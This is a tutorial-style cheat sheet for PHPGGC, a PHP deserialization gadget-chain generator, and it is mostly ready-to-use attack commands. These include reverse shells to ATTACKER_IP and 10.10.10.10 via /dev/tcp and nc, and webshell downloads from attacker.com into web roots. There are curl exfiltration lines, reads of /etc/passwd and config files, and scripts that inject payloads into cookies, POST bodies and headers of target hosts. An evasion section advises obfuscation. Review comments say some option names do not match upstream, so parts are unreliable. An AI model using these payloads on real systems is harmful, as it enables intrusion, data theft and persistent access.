
PHPGGC

PHPGGC (PHP Generic Gadget Chains) is a tool for generating malicious serialized PHP objects that exploit insecure deserialization vulnerabilities. It leverages “gadget chains” from common PHP frameworks and libraries to achieve remote code execution (RCE) when vulnerable applications unserialize untrusted data.

Key Features:

  • Pre-built gadget chains for popular PHP frameworks
  • Automatic payload generation for common targets
  • Support for multiple exploitation techniques
  • Chain discovery and analysis
  • Custom gadget chain creation
  • Integration with exploitation frameworks
# Obtain a local checkout of the tool and confirm it runs.
git clone https://github.com/ambionics/phpggc.git
cd phpggc
# Version check, then `-l` to list the gadget chains bundled with this checkout.
./phpggc --version
./phpggc -l
# Alternative: run the containerised build instead of a local checkout
# (image name taken from this page as-is; not verified here).
docker run -it --rm ambionics/phpggc
  • PHP 7.0 or later (including 8.0+)
  • Composer (optional, for dependency management)
./phpggc -l
./phpggc -l | grep "Laravel"
./phpggc Laravel/RCE
./phpggc Laravel/RCE system "whoami"
./phpggc -f json Laravel/RCE system "whoami"
./phpggc -f phtml Laravel/RCE system "whoami"
Command | Description
-l, --list | List all available gadget chains
-i, --info | Show detailed chain information
-c, --chains | Show chains for specific framework
-f, --format | Output format (raw, base64, json, phtml, etc.)
-s, --side-effect | Generate chain with side effects
--template | Use custom template for payload
--skip-vulnerabilities | Skip vulnerability checks
--verbose | Verbose output
# RCE via Laravel gadgets
./phpggc Laravel/RCE

# List all Laravel chains
./phpggc -l | grep -i laravel
# RCE via Symfony
./phpggc Symfony/RCE

# EventDispatcher exploitation
./phpggc -i Symfony/EventDispatcher
# WordPress plugin exploitation
./phpggc WordPress/RCE
./phpggc WordPress/Plugin
# Zend/Laminas exploitation
./phpggc Zend/RCE
./phpggc Laminas/RCE
./phpggc Yii/RCE
./phpggc CakePHP/RCE
./phpggc Doctrine/RCE
./phpggc Magento/RCE
./phpggc -f raw Laravel/RCE system "whoami"
./phpggc -f base64 Laravel/RCE system "whoami"
./phpggc -f url Laravel/RCE system "whoami"
./phpggc -f json Laravel/RCE system "whoami"
./phpggc -f phtml Laravel/RCE system "whoami" > payload.php
php payload.php
# Execute system commands
./phpggc Laravel/RCE system "id"
./phpggc Laravel/RCE system "cat /etc/passwd"
./phpggc Laravel/RCE system "curl http://attacker.com"
# Generate reverse shell payload
./phpggc Laravel/RCE system "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

# Or with nc
./phpggc Laravel/RCE system "nc -e /bin/bash ATTACKER_IP 4444"
# Write files via payload
./phpggc Laravel/RCE system "echo 'shell code' > /tmp/shell.php"

# More complex file operations
./phpggc Laravel/RCE system "wget http://attacker.com/shell.php -O /var/www/shell.php"
# Extract sensitive data
./phpggc Laravel/RCE system "cat /var/www/config.php | base64"

# Curl exfiltration
./phpggc Laravel/RCE system "curl http://attacker.com/log.php?data=$(whoami)"
# Get full details about a chain
./phpggc -i Laravel/RCE

# Show vulnerability details
./phpggc -i Symfony/RCE --verbose
# All chains for a specific framework
./phpggc -l Laravel
./phpggc -l WordPress
./phpggc -l Symfony
# Find chains containing specific keywords
./phpggc -l | grep -i "file"
./phpggc -l | grep -i "execute"
# Using custom template file
./phpggc -f raw --template custom.template Laravel/RCE system "whoami"
# Chains with side effects (file write, etc.)
./phpggc -s Laravel/RCE system "whoami"
# Execute multiple commands
./phpggc Laravel/RCE system "id; whoami; pwd"

# Or use command separator
./phpggc Laravel/RCE system "cmd1 && cmd2 && cmd3"
# Using alternative command syntax
./phpggc Laravel/RCE system "sh -c 'command'"

# Hex encoding commands
./phpggc Laravel/RCE system "echo 'x' | xxd -r -p"
# Generate payload for cookie injection
PAYLOAD=$(./phpggc -f base64 Laravel/RCE system "whoami")
curl -b "session=$PAYLOAD" http://target.com

# For POST parameter
curl -X POST http://target.com -d "data=$(./phpggc -f url Laravel/RCE system 'id')"
# Generate payload and store in variable
PAYLOAD=$(./phpggc -f raw Laravel/RCE system "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1")

# Use in exploitation script
php -r "echo unserialize(base64_decode('$PAYLOAD'));"
#!/bin/bash
# Test multiple framework vulnerabilities
# Generates the "<framework>/RCE" chain for each framework listed below,
# passing the same function/argument pair (system "$COMMAND") each time.
# Output is written to stdout only; nothing is sent to a remote host.
# NOTE(review): the "Testing ..." status line shares stdout with the
# generated payload, so redirecting this script to a file mixes the two;
# a status line on stderr (>&2) would keep them separate.
# NOTE(review): upstream phpggc numbers its chain ids (e.g. Laravel/RCE1)
# rather than using a bare "RCE", and `-f` is not its format option —
# verify chain ids with `./phpggc -l` and option names with `./phpggc -h`.
COMMAND="id"
for framework in Laravel Symfony Yii WordPress; do
  echo "Testing $framework..."
  ./phpggc -f raw "$framework/RCE" system "$COMMAND"
done
# Target URL with serialized parameter
curl "http://target.com/profile?data=$(./phpggc -f url Laravel/RCE system 'whoami')"
# Inject serialized payload into cookie
curl -b "session=$(./phpggc -f base64 Laravel/RCE system 'id')" http://target.com
# Inject into POST parameter
curl -X POST http://target.com \
  -d "profile=$(./phpggc -f url Laravel/RCE system 'whoami')"
# Inject into custom header
curl -H "X-Data: $(./phpggc -f base64 Laravel/RCE system 'id')" http://target.com
# Step 1: Identify Laravel application
# Step 2: Find unserialize() call (typically in session handling)

# Step 3: Generate payload
PAYLOAD=$(./phpggc -f base64 Laravel/RCE system "whoami")

# Step 4: Inject into vulnerable endpoint
curl -b "PHPSESSID=$PAYLOAD" http://target-laravel.com
# Identify vulnerable WordPress plugin using gadget chains
./phpggc -i WordPress/RCE

# Generate exploitation payload
./phpggc -f raw WordPress/RCE system "wp_create_user attacker password123"

# Or modify WordPress files
./phpggc WordPress/RCE system "wget http://attacker.com/shell.php -O /var/www/wp-content/shell.php"
# Identify Symfony version and components
# Generate appropriate Symfony chain

./phpggc -l | grep Symfony
./phpggc -i Symfony/EventDispatcher

# Create payload targeting EventDispatcher
PAYLOAD=$(./phpggc -f base64 Symfony/RCE system "id")
# Generate base64-encoded payload
./phpggc -f base64 Laravel/RCE system "whoami" > payload.b64

# Decode and execute
cat payload.b64 | base64 -d | php
# Generate URL-safe payload
./phpggc -f url Laravel/RCE system "whoami"

# Use in URL parameter
echo "http://target.com?data=$(./phpggc -f url Laravel/RCE system 'id')"
# Encode command to hex
echo -n "whoami" | xxd -p

# Use in payload
./phpggc Laravel/RCE system "echo '$(echo -n whoami | xxd -p)' | xxd -r -p"
# Look for unserialize() in source code
grep -r "unserialize" /path/to/php/app

# Check for user input passing to unserialize
grep -r "unserialize(\$_" /path/to/php/app
# Run test payload through application
PAYLOAD=$(./phpggc Laravel/RCE system "touch /tmp/test")

# Monitor for execution
tail -f /var/log/apache2/access.log
# Detect framework version for appropriate chains
curl -s http://target.com | grep -i "Laravel\|Symfony\|WordPress"

# Check composer.lock or package files
curl http://target.com/composer.lock 2>/dev/null | grep -i version
#!/bin/bash
# Generates one "<FRAMEWORK>/RCE" chain and delivers it to $TARGET in the
# `session` cookie. Step numbering mirrors the original: step 1 is a
# print statement only (no detection is performed) and step 4 is a
# commented-out listener reminder.
TARGET="http://target.com"
FRAMEWORK="Laravel"

# Step 1: Identify vulnerability
# (placeholder — this script performs no check here, it only prints)
echo "[+] Testing for deserialization vulnerabilities..."

# Step 2: Generate payload for RCE
# The chain wraps system() with $COMMAND as its argument.
# NOTE(review): `-f base64` is not an option name in upstream phpggc's
# help output — confirm with `./phpggc -h`.
COMMAND="bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"
PAYLOAD=$(./phpggc -f base64 "$FRAMEWORK/RCE" system "$COMMAND")

# Step 3: Deliver payload
# Defender note: the observable on the receiving side is a cookie whose
# value is a base64-encoded serialized PHP object, which is a usable
# request-inspection signature; the response body is printed unchecked.
echo "[+] Injecting payload..."
curl -b "session=$PAYLOAD" "$TARGET/dashboard"

# Step 4: Listener
# nc -lvnp 4444
#!/bin/bash
# Sends one generated chain (Laravel/RCE, system "id") to three carriers in
# turn — cookie, POST body and a custom header — printing a label before
# each request. Responses go to stdout unchecked; the script does not
# decide whether any of the three positions was accepted.
# NOTE(review): `-f base64` is not an option name in upstream phpggc's
# help output — confirm with `./phpggc -h`.
PAYLOAD=$(./phpggc -f base64 Laravel/RCE system "id")

# Test different injection points
# Defender note: the same encoded blob is reused in all three positions,
# so inspection rules should not be tied to a single carrier (cookie,
# form field or header).
echo "Testing Cookie..."
curl -b "data=$PAYLOAD" http://target.com

echo "Testing POST..."
curl -X POST -d "input=$PAYLOAD" http://target.com

echo "Testing Header..."
curl -H "X-Custom: $PAYLOAD" http://target.com
# Verify PHP version compatibility
php --version

# Test payload locally first
php -r "echo unserialize(base64_decode('PAYLOAD_HERE'));"

# Check target uses unserialize()
grep -r "unserialize" target_code/
# Test different output formats
./phpggc -f raw Laravel/RCE system "whoami"
./phpggc -f base64 Laravel/RCE system "whoami"
./phpggc -f json Laravel/RCE system "whoami"
# Update PHPGGC database
git pull
./phpggc -l --refresh

# Check if framework is supported
./phpggc -l | grep -i "framework_name"
  • Only test on authorized systems
  • Use isolated lab environments
  • Document all testing activities
  • Have rollback procedures ready
  • Avoid common payload patterns
  • Use encoding/obfuscation
  • Employ timing-based techniques
  • Monitor system logs for detection
# Check version
./phpggc --version

# Update gadget chains
cd phpggc && git pull origin master

Critical: PHPGGC generates payloads for testing deserialization vulnerabilities; use it only on systems where you have explicit authorization. Unauthorized exploitation is illegal. Always obtain written permission before conducting security assessments on any system.